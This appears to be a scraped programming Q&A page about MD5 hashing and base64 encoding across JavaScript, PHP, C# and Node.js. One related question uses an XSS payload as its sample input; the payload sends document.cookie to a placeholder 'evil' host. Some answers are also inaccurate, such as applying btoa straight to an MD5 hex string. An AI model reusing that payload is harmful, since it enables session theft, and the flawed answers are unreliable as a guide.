Getting MD5 hash in JavaScript and converting it to base 64 - javascript

I’d like to use a set of REST API through JavaScript and I’m reading the documentation explaining how to implement authentication.
The following instructions are illustrated in pseudocode but I have some issue on understanding how to implement it in JavaScript (my JS level is quite basic).
This is the unclear part:
= FromBytesToBase64String(MD5Hash("{\n \"data\": {\n \"type\": \"company\",\n \"id\": \"879f2dfc-57ea-4dbb-96c7-c546f8812f1e\",\n \"external_1_value\": \"Updated value\"\n }\n}"))
Basically I should calculate MD5 hash of the string in question and then I should encode it in base 64 string If I understood well.
The documentation shows the flow broken in sub-steps:
= FromBytesToBase64String(b'eC\xcda\xa3\xa7\xaf\xa53\x93\xb4.\xa2\xb1\xe3]')
And then the final result:
"ZUPNYaOnr6Uzk7QuorHjXQ=="
I tried to do the same by using crypto.js library and I get a MD5 hash string but then how can I get this value "ZUPNYaOnr6Uzk7QuorHjXQ==" ?
Any idea on how I could do it?
Thanks so much for helping!

That final result is the base64 encoded string. The function FromBytesToBase64String is what produces it, but this is not a standard function in JavaScript.
Instead, try using one of the built-in functions documented here. Specifically:
window.btoa(MD5Hash("Your input string"));

window.btoa(MD5Hash("Your input string")); does not work because btoa takes the md5 string and converts that character by character, hence you need to feed it an byte array.I ended up combining ArrayBuffer to base64 encoded string
with https://github.com/pvorb/node-md5/issues/25
into :
function md5ToBase64(md5String,boolTrimLast){
var strRet = arrayBufferToBase64(hexByteStringToByteArray(md5String));
return boolTrimLast?strRet.slice(0,22):strRet;
}

use the btoa() function to get a base64 encoded string.

Use WindowBase64.btoa():
var encodedData = window.btoa(md5Hash);

Related

Does the OWASP Java Encoder have any decoding functions?

I encoded the query string below with the forURIComponent method of the OWASP encoder.
String query = "query=hello'};
window.location = 'http://evil?'+document.cookie;va&r- b = {//]'";
String encodedQuery = Encode.forUriComponent(query);
Now I need to decode encodedQuery, and the decoded string should be exactly equal to the original query. How can I do this?
I assume you're talking about the OWASP Java Encoder. As far as I can tell, it does not supply any decoding functions.
However, since the Encode.forUriComponent() method implements standard URL percent encoding, you can use any correctly implemented URL decoding function to decode it. For example in Java, according to the answers to this question, you could use java.net.URLDecoder.
In JavaScript, decodeURIComponent() should do the trick. If you need to parse a URI containing (possibly) multiple parameters, however, you may find the URL class (or URLSearchParams) more convenient to use.

C# version of the javascript function btoa

I need to recode something from js to c# that utilises the btoa method in js on a string of unicode chars to convert them to base64. However, as far as I know the encoding used by javascrpt is different to all those available in c#. I need the encoding to be exactly the same and not return different values across these languages. I have tried setting up a nodejs server and making get requests to it, in order to run the encoding that way, but this is far too slow and unstable. I am under the impression I would need to make my own encoding table but I have no idea where to start or how to implement this. If anyone could help that would be greatly appreciated.
tl;dr: javascript's btoa returns different value than base 64 encoding in c# does. I need it to be the same values.
code and outputs:
c#:
String fromChar = new
String(247,71,186,8,125,72,2,1.0078125,0.003936767578125);
var plainTextBytes = System.Text.Encoding.UTF8.GetBytes(fromChar);
Console.WriteLine(System.Convert.ToBase64String(plainTextBytes));
output = w7dHwroIfUgCAQA=
javascript:
var x = btoa(String.fromCharCode(247,71,186,8,125,72,2,1.0078125,0.003936767578125);
console.log(x)
output =
90e6CH1IAgEA
I am aware the former example uses utf8 encoding which js does not, the problem is there is no encoding in .net that matches the javascript encoding.
Edit: Tried to compare the byte arrays of both c# and javascript but the problem is the btoa function uses an unnamed encoding, so I can't actually get the bytes to print the byte array for it without assuming it is something like utf8 which it is not.
Worked it out. For anyone wondering the encoding used is iso encoding. The btoa function in javascript can be replicated by using the following c# method:
public string encoding(string toEncode)
{
byte[] bytes= Encoding.GetEncoding(28591).GetBytes(toEncode);
string toReturn = System.Convert.ToBase64String(bytes);
return toReturn;
}
The decoding will be the following:
string base64EncodedString = "6Q==";
Encoding.GetEncoding(28591).GetString(Convert.FromBase64String(base64EncodedString));
// "é"

Produce same result as CryptoJS.enc.Base64 using PHP

I have a javascript function that I'm trying to convert to PHP, It uses CryptoJS library, speciafically components/enc-base64-min.js and rollups/md5.js. They can be found here.
In it is this bit of code
// Let's say str = 'hello';
var md5 = CryptoJS.MD5(str);
md5 = md5.toString(CryptoJS.enc.Base64);
// md5 outputs "XUFAKrxLKna5cZ2REBfFkg=="
I assumed the str variable is hashed using md5 then encoded to Base64, so I tried this simple code
$md5 = md5($str);
$md5 = base64_encode($md5);
// md5 outputs "MmZjMGE0MzNiMjg4MDNlNWI5NzkwNzgyZTRkNzdmMjI="
Then I tried validating both the outputs, looks like the JS output isnt even a valid Base64 string.
To understand further I tried to look for toString() parameter from W3Schools, but it doesnt make sense to me, as per the reference the parameter is supposed to be an integer (2, 8 or 16), then why is CryptoJS.enc.Base64 used instead?
My goal here isn't to produce a valid base64 encoded string using JS but rather to produce the same output using PHP.
php's md5() with a single parameter returns the md5 hash as a hex string.
Instead you want the raw bytes to be encoded into Base64 so you have to pass the optional parameter $raw_output too to md5() (set to true)
$md5 = md5($str, true);
http://php.net/manual/it/function.md5.php

base64 encoding in javascript decoding in php

I am trying to encode a string in javascript and decode it in php.
I use this code to put the string in a inputbox and then send it via form PUT.
document.getElementById('signature').value= b64EncodeUnicode(ab2str(signature));
And this code to decode
$signature=base64_decode($signature);
Here there is a jsfiddle for the encoding page:
https://jsfiddle.net/okaea662/
The problem is that I always get a string 98% correct but with some different characters.
For example: (the first string is the string printed in the inputbox)
¦S÷ä½m0×C|u>£áWÅàUù»¥ïs7Dþ1Ji%ýÊ{\ö°(úýýÁñxçO9Ù¡ö}XÇIWçβÆü8ú²ðÑOA¤nì6S+̽ i¼?¼ºNËÒo·a©8»eO|PPþBE=HèÑqaX©$Ì磰©b2(Ðç.$nÈR,ä_OX¾xè¥3éÂòkå¾ N,sáW§ÝáV:ö~Å×à<4)íÇKo¡L¤<Í»äA(!xón#WÙÕGù¾g!)ùC)]Q(*}?­Ìp
¦S÷ ä½m0×C|u>£áWÅàUù»¥ïs7Dþ1Ji%ýÊ{\ö°(úýýÁñxçO9Ù¡ö}XÇIWçβÆü8ú²ðÑOA¤nì6S+̽ i¼?¼ºNËÒo·a©8»eO|PPþBE=HèÑ qaX©$Ì磰©b2(Ðç.$nÈR,ä_OX¾xè¥3éÂòkå¾ N ,sá W§ÝáV:ö~Å×à<4)íÇKo¡L¤<Í»äA(!xón#WÙÕGù¾g!)ùC)]Q(*}?­Ìp
Note that the 4th character is distinct and then there is one or two more somewhere.
The string corresponds to a digital signature so these characters make the signature to be invalid.
I have no idea what is happening here. Any idea? I use Chrome browser and utf-8 encoding in header and metas (Firefox seems to use a different encoding in the inputbox but I will look that problem later)
EDIT:
The encoding to base64 apparently is not the problem. The base64 encoded string is the same in the browser than in the server. If I base64-decode it in javascript I get the original string but if I decode it in PHP I get a slightly different string.
EDIT2:
I still don't know what the problem is but I have avoided it sending the data in a blob with ajax.
Try using this command to encode your string with js:
var signature = document.getElementById('signature');
var base64 = window.btoa(signature);
Now with php, you simply use: base64_decode($signature)
If that doesn't work (I haven't tested it) there may be something wrong with the btoa func. So checkout this link here:
https://developer.mozilla.org/en-US/docs/Web/API/WindowBase64/Base64_encoding_and_decoding
There is a function in there that should work (if the above does not)
function b64EncodeUnicode(str) {
return btoa(encodeURIComponent(str).replace(/%([0-9A-F]{2})/g, function(match, p1) {
return String.fromCharCode('0x' + p1);
}));
}
b64EncodeUnicode(signature); // "4pyTIMOgIGxhIG1vZGU="

How to encode 256bit AES key using base64?

I am using NodeJS to interact with Amazon Web Services (specifically s3). I am attempting to use Server side encryption with customer keys. Only AES256 is allowed as an encryption method. The API specifies that the keys be base64 encoded.
At the moment I am merely testing the AWS api, I am using throwaway test files, so security (and secure key generation) are not an issue at the moment.
My problem is as follows: Given that I am in posession of a 256bit hexadecimal string, how do I obtain a base64 encoded string of the integer that that represents?
My first instinct was to first parse the Hexadecimal string as an integer, and convert it to a string using toString(radix) specifying a radix of 64. However toString() accepts a maximum radix of 36. Is there another way of doing this?
And even if I do this, is that a base64 encoded string of 256bit encryption key? The API reference just says that it expects a key that is "appropriate for use with the algorithm specified". (I am using the putObject method).
To convert a hex string to a base64 string in node.js, you can very easily use a Buffer;
var key_in_hex = '11223344556677881122334455667788'
var buf = new Buffer(key_in_hex, 'hex')
var str = buf.toString('base64')
...which will set str to the base64 equivalent of the hex string passed in ('112233...')
You could also of course combine it to a one liner;
var key_in_hex = '11223344556677881122334455667788'
var str = new Buffer(key_in_hex, 'hex').toString('base64')

Categories